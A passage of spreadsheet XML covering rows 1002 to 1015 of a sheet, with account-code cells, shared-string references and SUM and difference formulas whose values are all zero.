        <f t="shared" si="480"/>
        <v>0</v>
      </c>
      <c r="AI1002" s="17">
        <f t="shared" si="480"/>
        <v>0</v>
      </c>
      <c r="AJ1002" s="17">
        <f t="shared" si="480"/>
        <v>0</v>
      </c>
      <c r="AK1002" s="17">
        <f t="shared" si="480"/>
        <v>0</v>
      </c>
      <c r="AL1002" s="17">
        <f t="shared" si="480"/>
        <v>0</v>
      </c>
      <c r="AM1002" s="17">
        <f t="shared" si="480"/>
        <v>0</v>
      </c>
      <c r="AN1002" s="17">
        <f t="shared" si="480"/>
        <v>0</v>
      </c>
      <c r="AO1002" s="17">
        <f t="shared" si="480"/>
        <v>0</v>
      </c>
      <c r="AP1002" s="17">
        <f t="shared" si="480"/>
        <v>0</v>
      </c>
    </row>
    <row r="1003" ht="18" customHeight="1" spans="1:42">
      <c r="A1003" s="10"/>
      <c r="B1003" s="10"/>
      <c r="C1003" s="28"/>
      <c r="D1003" s="10">
        <v>2140399</v>
      </c>
      <c r="E1003" s="16" t="s">
        <v>3769</v>
      </c>
      <c r="F1003" s="14">
        <f t="shared" si="473"/>
        <v>0</v>
      </c>
      <c r="G1003" s="17"/>
      <c r="H1003" s="17"/>
      <c r="I1003" s="17"/>
      <c r="J1003" s="17"/>
      <c r="K1003" s="17"/>
      <c r="L1003" s="17"/>
      <c r="M1003" s="17"/>
      <c r="N1003" s="17"/>
      <c r="O1003" s="17"/>
      <c r="P1003" s="17"/>
      <c r="Q1003" s="17"/>
      <c r="R1003" s="17"/>
      <c r="S1003" s="17"/>
      <c r="T1003" s="17"/>
      <c r="U1003" s="17"/>
      <c r="V1003" s="17"/>
      <c r="W1003" s="17"/>
      <c r="X1003" s="17"/>
      <c r="Y1003" s="17"/>
      <c r="Z1003" s="17"/>
      <c r="AA1003" s="17"/>
      <c r="AB1003" s="17"/>
      <c r="AC1003" s="17"/>
      <c r="AD1003" s="17"/>
      <c r="AE1003" s="17">
        <f t="shared" si="480"/>
        <v>0</v>
      </c>
      <c r="AF1003" s="17">
        <f t="shared" si="480"/>
        <v>0</v>
      </c>
      <c r="AG1003" s="17">
        <f t="shared" si="480"/>
        <v>0</v>
      </c>
      <c r="AH1003" s="17">
        <f t="shared" si="480"/>
        <v>0</v>
      </c>
      <c r="AI1003" s="17">
        <f t="shared" si="480"/>
        <v>0</v>
      </c>
      <c r="AJ1003" s="17">
        <f t="shared" si="480"/>
        <v>0</v>
      </c>
      <c r="AK1003" s="17">
        <f t="shared" si="480"/>
        <v>0</v>
      </c>
      <c r="AL1003" s="17">
        <f t="shared" si="480"/>
        <v>0</v>
      </c>
      <c r="AM1003" s="17">
        <f t="shared" si="480"/>
        <v>0</v>
      </c>
      <c r="AN1003" s="17">
        <f t="shared" si="480"/>
        <v>0</v>
      </c>
      <c r="AO1003" s="17">
        <f t="shared" si="480"/>
        <v>0</v>
      </c>
      <c r="AP1003" s="17">
        <f t="shared" si="480"/>
        <v>0</v>
      </c>
    </row>
    <row r="1004" ht="18" customHeight="1" spans="1:42">
      <c r="A1004" s="10"/>
      <c r="B1004" s="10"/>
      <c r="C1004" s="28"/>
      <c r="D1004" s="10">
        <v>21404</v>
      </c>
      <c r="E1004" s="11" t="s">
        <v>3770</v>
      </c>
      <c r="F1004" s="14">
        <f t="shared" si="473"/>
        <v>0</v>
      </c>
      <c r="G1004" s="12">
        <f t="shared" ref="G1004:R1004" si="481">SUM(G1005:G1008)</f>
        <v>0</v>
      </c>
      <c r="H1004" s="12">
        <f t="shared" si="481"/>
        <v>0</v>
      </c>
      <c r="I1004" s="12">
        <f t="shared" si="481"/>
        <v>0</v>
      </c>
      <c r="J1004" s="12">
        <f t="shared" si="481"/>
        <v>0</v>
      </c>
      <c r="K1004" s="12">
        <f t="shared" si="481"/>
        <v>0</v>
      </c>
      <c r="L1004" s="12">
        <f t="shared" si="481"/>
        <v>0</v>
      </c>
      <c r="M1004" s="12">
        <f t="shared" si="481"/>
        <v>0</v>
      </c>
      <c r="N1004" s="12">
        <f t="shared" si="481"/>
        <v>0</v>
      </c>
      <c r="O1004" s="12">
        <f t="shared" si="481"/>
        <v>0</v>
      </c>
      <c r="P1004" s="12">
        <f t="shared" si="481"/>
        <v>0</v>
      </c>
      <c r="Q1004" s="12">
        <f t="shared" si="481"/>
        <v>0</v>
      </c>
      <c r="R1004" s="12">
        <f t="shared" si="481"/>
        <v>0</v>
      </c>
      <c r="S1004" s="12">
        <v>0</v>
      </c>
      <c r="T1004" s="12">
        <v>0</v>
      </c>
      <c r="U1004" s="12">
        <v>0</v>
      </c>
      <c r="V1004" s="12">
        <v>0</v>
      </c>
      <c r="W1004" s="12">
        <v>0</v>
      </c>
      <c r="X1004" s="12">
        <v>0</v>
      </c>
      <c r="Y1004" s="12">
        <v>0</v>
      </c>
      <c r="Z1004" s="12">
        <v>0</v>
      </c>
      <c r="AA1004" s="12">
        <v>0</v>
      </c>
      <c r="AB1004" s="12">
        <v>0</v>
      </c>
      <c r="AC1004" s="12">
        <v>0</v>
      </c>
      <c r="AD1004" s="12">
        <v>0</v>
      </c>
      <c r="AE1004" s="12">
        <f t="shared" ref="AE1004:AP1004" si="482">SUM(AE1005:AE1008)</f>
        <v>0</v>
      </c>
      <c r="AF1004" s="12">
        <f t="shared" si="482"/>
        <v>0</v>
      </c>
      <c r="AG1004" s="12">
        <f t="shared" si="482"/>
        <v>0</v>
      </c>
      <c r="AH1004" s="12">
        <f t="shared" si="482"/>
        <v>0</v>
      </c>
      <c r="AI1004" s="12">
        <f t="shared" si="482"/>
        <v>0</v>
      </c>
      <c r="AJ1004" s="12">
        <f t="shared" si="482"/>
        <v>0</v>
      </c>
      <c r="AK1004" s="12">
        <f t="shared" si="482"/>
        <v>0</v>
      </c>
      <c r="AL1004" s="12">
        <f t="shared" si="482"/>
        <v>0</v>
      </c>
      <c r="AM1004" s="12">
        <f t="shared" si="482"/>
        <v>0</v>
      </c>
      <c r="AN1004" s="12">
        <f t="shared" si="482"/>
        <v>0</v>
      </c>
      <c r="AO1004" s="12">
        <f t="shared" si="482"/>
        <v>0</v>
      </c>
      <c r="AP1004" s="12">
        <f t="shared" si="482"/>
        <v>0</v>
      </c>
    </row>
    <row r="1005" ht="18" customHeight="1" spans="1:42">
      <c r="A1005" s="10"/>
      <c r="B1005" s="10"/>
      <c r="C1005" s="28"/>
      <c r="D1005" s="10">
        <v>2140401</v>
      </c>
      <c r="E1005" s="16" t="s">
        <v>3771</v>
      </c>
      <c r="F1005" s="14">
        <f t="shared" si="473"/>
        <v>0</v>
      </c>
      <c r="G1005" s="17"/>
      <c r="H1005" s="17"/>
      <c r="I1005" s="17"/>
      <c r="J1005" s="17"/>
      <c r="K1005" s="17"/>
      <c r="L1005" s="17"/>
      <c r="M1005" s="17"/>
      <c r="N1005" s="17"/>
      <c r="O1005" s="17"/>
      <c r="P1005" s="17"/>
      <c r="Q1005" s="17"/>
      <c r="R1005" s="17"/>
      <c r="S1005" s="17"/>
      <c r="T1005" s="17"/>
      <c r="U1005" s="17"/>
      <c r="V1005" s="17"/>
      <c r="W1005" s="17"/>
      <c r="X1005" s="17"/>
      <c r="Y1005" s="17"/>
      <c r="Z1005" s="17"/>
      <c r="AA1005" s="17"/>
      <c r="AB1005" s="17"/>
      <c r="AC1005" s="17"/>
      <c r="AD1005" s="17"/>
      <c r="AE1005" s="17">
        <f t="shared" ref="AE1005:AP1008" si="483">G1005-S1005</f>
        <v>0</v>
      </c>
      <c r="AF1005" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AG1005" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AH1005" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AI1005" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AJ1005" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AK1005" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AL1005" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AM1005" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AN1005" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AO1005" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AP1005" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
    </row>
    <row r="1006" ht="18" customHeight="1" spans="1:42">
      <c r="A1006" s="10"/>
      <c r="B1006" s="10"/>
      <c r="C1006" s="28"/>
      <c r="D1006" s="10">
        <v>2140402</v>
      </c>
      <c r="E1006" s="16" t="s">
        <v>3772</v>
      </c>
      <c r="F1006" s="14">
        <f t="shared" si="473"/>
        <v>0</v>
      </c>
      <c r="G1006" s="17"/>
      <c r="H1006" s="17"/>
      <c r="I1006" s="17"/>
      <c r="J1006" s="17"/>
      <c r="K1006" s="17"/>
      <c r="L1006" s="17"/>
      <c r="M1006" s="17"/>
      <c r="N1006" s="17"/>
      <c r="O1006" s="17"/>
      <c r="P1006" s="17"/>
      <c r="Q1006" s="17"/>
      <c r="R1006" s="17"/>
      <c r="S1006" s="17"/>
      <c r="T1006" s="17"/>
      <c r="U1006" s="17"/>
      <c r="V1006" s="17"/>
      <c r="W1006" s="17"/>
      <c r="X1006" s="17"/>
      <c r="Y1006" s="17"/>
      <c r="Z1006" s="17"/>
      <c r="AA1006" s="17"/>
      <c r="AB1006" s="17"/>
      <c r="AC1006" s="17"/>
      <c r="AD1006" s="17"/>
      <c r="AE1006" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AF1006" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AG1006" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AH1006" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AI1006" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AJ1006" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AK1006" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AL1006" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AM1006" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AN1006" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AO1006" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AP1006" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
    </row>
    <row r="1007" ht="18" customHeight="1" spans="1:42">
      <c r="A1007" s="10"/>
      <c r="B1007" s="10"/>
      <c r="C1007" s="28"/>
      <c r="D1007" s="10">
        <v>2140403</v>
      </c>
      <c r="E1007" s="16" t="s">
        <v>3773</v>
      </c>
      <c r="F1007" s="14">
        <f t="shared" si="473"/>
        <v>0</v>
      </c>
      <c r="G1007" s="17"/>
      <c r="H1007" s="17"/>
      <c r="I1007" s="17"/>
      <c r="J1007" s="17"/>
      <c r="K1007" s="17"/>
      <c r="L1007" s="17"/>
      <c r="M1007" s="17"/>
      <c r="N1007" s="17"/>
      <c r="O1007" s="17"/>
      <c r="P1007" s="17"/>
      <c r="Q1007" s="17"/>
      <c r="R1007" s="17"/>
      <c r="S1007" s="17"/>
      <c r="T1007" s="17"/>
      <c r="U1007" s="17"/>
      <c r="V1007" s="17"/>
      <c r="W1007" s="17"/>
      <c r="X1007" s="17"/>
      <c r="Y1007" s="17"/>
      <c r="Z1007" s="17"/>
      <c r="AA1007" s="17"/>
      <c r="AB1007" s="17"/>
      <c r="AC1007" s="17"/>
      <c r="AD1007" s="17"/>
      <c r="AE1007" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AF1007" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AG1007" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AH1007" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AI1007" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AJ1007" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AK1007" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AL1007" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AM1007" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AN1007" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AO1007" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AP1007" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
    </row>
    <row r="1008" ht="18" customHeight="1" spans="1:42">
      <c r="A1008" s="10"/>
      <c r="B1008" s="10"/>
      <c r="C1008" s="28"/>
      <c r="D1008" s="10">
        <v>2140499</v>
      </c>
      <c r="E1008" s="16" t="s">
        <v>3774</v>
      </c>
      <c r="F1008" s="14">
        <f t="shared" si="473"/>
        <v>0</v>
      </c>
      <c r="G1008" s="17"/>
      <c r="H1008" s="17"/>
      <c r="I1008" s="17"/>
      <c r="J1008" s="17"/>
      <c r="K1008" s="17"/>
      <c r="L1008" s="17"/>
      <c r="M1008" s="17"/>
      <c r="N1008" s="17"/>
      <c r="O1008" s="17"/>
      <c r="P1008" s="17"/>
      <c r="Q1008" s="17"/>
      <c r="R1008" s="17"/>
      <c r="S1008" s="17"/>
      <c r="T1008" s="17"/>
      <c r="U1008" s="17"/>
      <c r="V1008" s="17"/>
      <c r="W1008" s="17"/>
      <c r="X1008" s="17"/>
      <c r="Y1008" s="17"/>
      <c r="Z1008" s="17"/>
      <c r="AA1008" s="17"/>
      <c r="AB1008" s="17"/>
      <c r="AC1008" s="17"/>
      <c r="AD1008" s="17"/>
      <c r="AE1008" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AF1008" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AG1008" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AH1008" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AI1008" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AJ1008" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AK1008" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AL1008" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AM1008" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AN1008" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AO1008" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
      <c r="AP1008" s="17">
        <f t="shared" si="483"/>
        <v>0</v>
      </c>
    </row>
    <row r="1009" ht="18" customHeight="1" spans="1:42">
      <c r="A1009" s="10"/>
      <c r="B1009" s="10"/>
      <c r="C1009" s="28"/>
      <c r="D1009" s="10">
        <v>21405</v>
      </c>
      <c r="E1009" s="11" t="s">
        <v>3775</v>
      </c>
      <c r="F1009" s="14">
        <f t="shared" si="473"/>
        <v>0</v>
      </c>
      <c r="G1009" s="12">
        <f t="shared" ref="G1009:R1009" si="484">SUM(G1010:G1015)</f>
        <v>0</v>
      </c>
      <c r="H1009" s="12">
        <f t="shared" si="484"/>
        <v>0</v>
      </c>
      <c r="I1009" s="12">
        <f t="shared" si="484"/>
        <v>0</v>
      </c>
      <c r="J1009" s="12">
        <f t="shared" si="484"/>
        <v>0</v>
      </c>
      <c r="K1009" s="12">
        <f t="shared" si="484"/>
        <v>0</v>
      </c>
      <c r="L1009" s="12">
        <f t="shared" si="484"/>
        <v>0</v>
      </c>
      <c r="M1009" s="12">
        <f t="shared" si="484"/>
        <v>0</v>
      </c>
      <c r="N1009" s="12">
        <f t="shared" si="484"/>
        <v>0</v>
      </c>
      <c r="O1009" s="12">
        <f t="shared" si="484"/>
        <v>0</v>
      </c>
      <c r="P1009" s="12">
        <f t="shared" si="484"/>
        <v>0</v>
      </c>
      <c r="Q1009" s="12">
        <f t="shared" si="484"/>
        <v>0</v>
      </c>
      <c r="R1009" s="12">
        <f t="shared" si="484"/>
        <v>0</v>
      </c>
      <c r="S1009" s="12">
        <v>0</v>
      </c>
      <c r="T1009" s="12">
        <v>0</v>
      </c>
      <c r="U1009" s="12">
        <v>0</v>
      </c>
      <c r="V1009" s="12">
        <v>0</v>
      </c>
      <c r="W1009" s="12">
        <v>0</v>
      </c>
      <c r="X1009" s="12">
        <v>0</v>
      </c>
      <c r="Y1009" s="12">
        <v>0</v>
      </c>
      <c r="Z1009" s="12">
        <v>0</v>
      </c>
      <c r="AA1009" s="12">
        <v>0</v>
      </c>
      <c r="AB1009" s="12">
        <v>0</v>
      </c>
      <c r="AC1009" s="12">
        <v>0</v>
      </c>
      <c r="AD1009" s="12">
        <v>0</v>
      </c>
      <c r="AE1009" s="12">
        <f t="shared" ref="AE1009:AP1009" si="485">SUM(AE1010:AE1015)</f>
        <v>0</v>
      </c>
      <c r="AF1009" s="12">
        <f t="shared" si="485"/>
        <v>0</v>
      </c>
      <c r="AG1009" s="12">
        <f t="shared" si="485"/>
        <v>0</v>
      </c>
      <c r="AH1009" s="12">
        <f t="shared" si="485"/>
        <v>0</v>
      </c>
      <c r="AI1009" s="12">
        <f t="shared" si="485"/>
        <v>0</v>
      </c>
      <c r="AJ1009" s="12">
        <f t="shared" si="485"/>
        <v>0</v>
      </c>
      <c r="AK1009" s="12">
        <f t="shared" si="485"/>
        <v>0</v>
      </c>
      <c r="AL1009" s="12">
        <f t="shared" si="485"/>
        <v>0</v>
      </c>
      <c r="AM1009" s="12">
        <f t="shared" si="485"/>
        <v>0</v>
      </c>
      <c r="AN1009" s="12">
        <f t="shared" si="485"/>
        <v>0</v>
      </c>
      <c r="AO1009" s="12">
        <f t="shared" si="485"/>
        <v>0</v>
      </c>
      <c r="AP1009" s="12">
        <f t="shared" si="485"/>
        <v>0</v>
      </c>
    </row>
    <row r="1010" ht="18" customHeight="1" spans="1:42">
      <c r="A1010" s="10"/>
      <c r="B1010" s="10"/>
      <c r="C1010" s="28"/>
      <c r="D1010" s="10">
        <v>2140501</v>
      </c>
      <c r="E1010" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F1010" s="14">
        <f t="shared" si="473"/>
        <v>0</v>
      </c>
      <c r="G1010" s="17"/>
      <c r="H1010" s="17"/>
      <c r="I1010" s="17"/>
      <c r="J1010" s="17"/>
      <c r="K1010" s="17"/>
      <c r="L1010" s="17"/>
      <c r="M1010" s="17"/>
      <c r="N1010" s="17"/>
      <c r="O1010" s="17"/>
      <c r="P1010" s="17"/>
      <c r="Q1010" s="17"/>
      <c r="R1010" s="17"/>
      <c r="S1010" s="17"/>
      <c r="T1010" s="17"/>
      <c r="U1010" s="17"/>
      <c r="V1010" s="17"/>
      <c r="W1010" s="17"/>
      <c r="X1010" s="17"/>
      <c r="Y1010" s="17"/>
      <c r="Z1010" s="17"/>
      <c r="AA1010" s="17"/>
      <c r="AB1010" s="17"/>
      <c r="AC1010" s="17"/>
      <c r="AD1010" s="17"/>
      <c r="AE1010" s="17">
        <f t="shared" ref="AE1010:AP1015" si="486">G1010-S1010</f>
        <v>0</v>
      </c>
      <c r="AF1010" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AG1010" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AH1010" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AI1010" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AJ1010" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AK1010" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AL1010" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AM1010" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AN1010" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AO1010" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AP1010" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
    </row>
    <row r="1011" ht="18" customHeight="1" spans="1:42">
      <c r="A1011" s="10"/>
      <c r="B1011" s="10"/>
      <c r="C1011" s="28"/>
      <c r="D1011" s="10">
        <v>2140502</v>
      </c>
      <c r="E1011" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F1011" s="14">
        <f t="shared" si="473"/>
        <v>0</v>
      </c>
      <c r="G1011" s="17"/>
      <c r="H1011" s="17"/>
      <c r="I1011" s="17"/>
      <c r="J1011" s="17"/>
      <c r="K1011" s="17"/>
      <c r="L1011" s="17"/>
      <c r="M1011" s="17"/>
      <c r="N1011" s="17"/>
      <c r="O1011" s="17"/>
      <c r="P1011" s="17"/>
      <c r="Q1011" s="17"/>
      <c r="R1011" s="17"/>
      <c r="S1011" s="17"/>
      <c r="T1011" s="17"/>
      <c r="U1011" s="17"/>
      <c r="V1011" s="17"/>
      <c r="W1011" s="17"/>
      <c r="X1011" s="17"/>
      <c r="Y1011" s="17"/>
      <c r="Z1011" s="17"/>
      <c r="AA1011" s="17"/>
      <c r="AB1011" s="17"/>
      <c r="AC1011" s="17"/>
      <c r="AD1011" s="17"/>
      <c r="AE1011" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AF1011" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AG1011" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AH1011" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AI1011" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AJ1011" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AK1011" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AL1011" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AM1011" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AN1011" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AO1011" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AP1011" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
    </row>
    <row r="1012" ht="18" customHeight="1" spans="1:42">
      <c r="A1012" s="10"/>
      <c r="B1012" s="10"/>
      <c r="C1012" s="28"/>
      <c r="D1012" s="10">
        <v>2140503</v>
      </c>
      <c r="E1012" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F1012" s="14">
        <f t="shared" si="473"/>
        <v>0</v>
      </c>
      <c r="G1012" s="17"/>
      <c r="H1012" s="17"/>
      <c r="I1012" s="17"/>
      <c r="J1012" s="17"/>
      <c r="K1012" s="17"/>
      <c r="L1012" s="17"/>
      <c r="M1012" s="17"/>
      <c r="N1012" s="17"/>
      <c r="O1012" s="17"/>
      <c r="P1012" s="17"/>
      <c r="Q1012" s="17"/>
      <c r="R1012" s="17"/>
      <c r="S1012" s="17"/>
      <c r="T1012" s="17"/>
      <c r="U1012" s="17"/>
      <c r="V1012" s="17"/>
      <c r="W1012" s="17"/>
      <c r="X1012" s="17"/>
      <c r="Y1012" s="17"/>
      <c r="Z1012" s="17"/>
      <c r="AA1012" s="17"/>
      <c r="AB1012" s="17"/>
      <c r="AC1012" s="17"/>
      <c r="AD1012" s="17"/>
      <c r="AE1012" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AF1012" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AG1012" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AH1012" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AI1012" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AJ1012" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AK1012" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AL1012" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AM1012" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AN1012" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AO1012" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AP1012" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
    </row>
    <row r="1013" ht="18" customHeight="1" spans="1:42">
      <c r="A1013" s="10"/>
      <c r="B1013" s="10"/>
      <c r="C1013" s="28"/>
      <c r="D1013" s="10">
        <v>2140504</v>
      </c>
      <c r="E1013" s="16" t="s">
        <v>3761</v>
      </c>
      <c r="F1013" s="14">
        <f t="shared" si="473"/>
        <v>0</v>
      </c>
      <c r="G1013" s="17"/>
      <c r="H1013" s="17"/>
      <c r="I1013" s="17"/>
      <c r="J1013" s="17"/>
      <c r="K1013" s="17"/>
      <c r="L1013" s="17"/>
      <c r="M1013" s="17"/>
      <c r="N1013" s="17"/>
      <c r="O1013" s="17"/>
      <c r="P1013" s="17"/>
      <c r="Q1013" s="17"/>
      <c r="R1013" s="17"/>
      <c r="S1013" s="17"/>
      <c r="T1013" s="17"/>
      <c r="U1013" s="17"/>
      <c r="V1013" s="17"/>
      <c r="W1013" s="17"/>
      <c r="X1013" s="17"/>
      <c r="Y1013" s="17"/>
      <c r="Z1013" s="17"/>
      <c r="AA1013" s="17"/>
      <c r="AB1013" s="17"/>
      <c r="AC1013" s="17"/>
      <c r="AD1013" s="17"/>
      <c r="AE1013" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AF1013" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AG1013" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AH1013" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AI1013" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AJ1013" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AK1013" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AL1013" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AM1013" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AN1013" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AO1013" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AP1013" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
    </row>
    <row r="1014" ht="18" customHeight="1" spans="1:42">
      <c r="A1014" s="10"/>
      <c r="B1014" s="10"/>
      <c r="C1014" s="28"/>
      <c r="D1014" s="10">
        <v>2140505</v>
      </c>
      <c r="E1014" s="16" t="s">
        <v>3776</v>
      </c>
      <c r="F1014" s="14">
        <f t="shared" si="473"/>
        <v>0</v>
      </c>
      <c r="G1014" s="17"/>
      <c r="H1014" s="17"/>
      <c r="I1014" s="17"/>
      <c r="J1014" s="17"/>
      <c r="K1014" s="17"/>
      <c r="L1014" s="17"/>
      <c r="M1014" s="17"/>
      <c r="N1014" s="17"/>
      <c r="O1014" s="17"/>
      <c r="P1014" s="17"/>
      <c r="Q1014" s="17"/>
      <c r="R1014" s="17"/>
      <c r="S1014" s="17"/>
      <c r="T1014" s="17"/>
      <c r="U1014" s="17"/>
      <c r="V1014" s="17"/>
      <c r="W1014" s="17"/>
      <c r="X1014" s="17"/>
      <c r="Y1014" s="17"/>
      <c r="Z1014" s="17"/>
      <c r="AA1014" s="17"/>
      <c r="AB1014" s="17"/>
      <c r="AC1014" s="17"/>
      <c r="AD1014" s="17"/>
      <c r="AE1014" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AF1014" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AG1014" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AH1014" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AI1014" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AJ1014" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AK1014" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AL1014" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AM1014" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AN1014" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AO1014" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AP1014" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
    </row>
    <row r="1015" ht="18" customHeight="1" spans="1:42">
      <c r="A1015" s="10"/>
      <c r="B1015" s="10"/>
      <c r="C1015" s="28"/>
      <c r="D1015" s="10">
        <v>2140599</v>
      </c>
      <c r="E1015" s="16" t="s">
        <v>3777</v>
      </c>
      <c r="F1015" s="14">
        <f t="shared" si="473"/>
        <v>0</v>
      </c>
      <c r="G1015" s="17"/>
      <c r="H1015" s="17"/>
      <c r="I1015" s="17"/>
      <c r="J1015" s="17"/>
